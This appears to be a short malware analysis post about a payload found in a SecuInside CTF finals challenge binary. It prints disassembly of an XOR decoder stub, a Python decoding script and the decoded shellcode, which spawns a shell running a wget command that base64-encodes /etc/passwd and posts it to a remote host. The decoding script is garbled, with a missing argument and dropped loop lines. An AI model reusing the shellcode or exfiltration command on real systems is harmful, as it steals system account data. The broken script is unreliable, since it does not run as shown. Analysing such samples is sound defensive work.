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Last active September 22, 2015 19:15
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secuinside challenge malware

Just a small present which was in one of the SecuInside Finals challenge binaries. The source appears to be that a South Korean government mail server was hacked, and challenge binaries being sent by the organizers went over it, and were thus infected themselves.

It doesn't look like it was active or invoked from anywhere, but then I didn't look too hard either. All it does is grabs /etc/passwd and shuttles it off to some AWS node.

There's a really cool story behind this incident, involving the South Korean government arresting CTF players, which you can hear about here:

from pwn import * # to install
e = ELF('notes_19cd983d58eef2e5c7881ae8407e76d6')
### Decoder loop, which is never referenced
.data:0804C0A0 ; ---------------------------------------------------------------------------
.data:0804C0A0 mov eax, 2
.data:0804C0A5 int 80h ; LINUX - sys_fork
.data:0804C0A7 test eax, eax
.data:0804C0A9 jz short loc_804C0B2
.data:0804C0AB mov eax, 41414141h
.data:0804C0B0 jmp eax
.data:0804C0B2 ; ---------------------------------------------------------------------------
.data:0804C0B2 loc_804C0B2: ; CODE XREF: .data:0804C0A9j
.data:0804C0B2 cld
.data:0804C0B3 mov ebx, 5363FD0h ; xor key
.data:0804C0B8 jmp short call_decode_loop
.data:0804C0BA ; =============== S U B R O U T I N E =======================================
.data:0804C0BA decode_loop proc near ; CODE XREF: .data:call_decode_loopp
.data:0804C0BA pop esi
.data:0804C0BB push esi
.data:0804C0BC loop: ; CODE XREF: decode_loop+9j
.data:0804C0BC xor [esi], ebx
.data:0804C0BE lodsd
.data:0804C0BF add ebx, eax
.data:0804C0C1 test eax, eax
.data:0804C0C3 jnz short loop
.data:0804C0C5 retn
.data:0804C0C5 decode_loop endp
.data:0804C0C6 ; ---------------------------------------------------------------------------
.data:0804C0C6 call_decode_loop: ; CODE XREF: .data:0804C0B8j
.data:0804C0C6 call decode_loop
.data:0804C0C6 ; ---------------------------------------------------------------------------
.data:0804C0CB dd 9C6E34BAh
decoder = 0x0804C0A0
encoded = 0x0804C0CB
ebx = 0x5363FD0
data = []
while True:
dword = unpack(, 4))
dword ^= ebx
eax = dword
ebx = (ebx + eax) & 0xffffffff
if dword == 0:
encoded += 4
payload = ''.join(map(pack, data))
print hexdump(payload)
write('payload', payload)
### The dumped payload looks something like
seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:00000000 push 0Bh ; sys_execve
seg000:00000002 pop eax
seg000:00000003 cdq
seg000:00000004 push edx
seg000:00000005 push small 632Dh
seg000:00000009 mov edi, esp
seg000:0000000B push 'hs/'
seg000:00000010 push 'nib/'
seg000:00000015 mov ebx, esp
seg000:00000017 push edx
seg000:00000018 call loc_C4
seg000:00000018 ; ---------------------------------------------------------------------------
seg000:0000001D aWgetHttp54_178 db 'wget --post-data "`cat /etc/p'
seg000:0000001D db 'asswd | base64 | tr -d "\n"`" --header="Content-Type: text/plain"'
seg000:0000001D db ' -O /dev/null >/dev/null 2>/dev/null',0
seg000:000000C4 ; ---------------------------------------------------------------------------
seg000:000000C4 loc_C4: ; CODE XREF: seg000:00000018p
seg000:000000C4 push edi
seg000:000000C5 push ebx
seg000:000000C6 mov ecx, esp
seg000:000000C8 int 80h ; LINUX -
seg000:000000C8 ; ---------------------------------------------------------------------------
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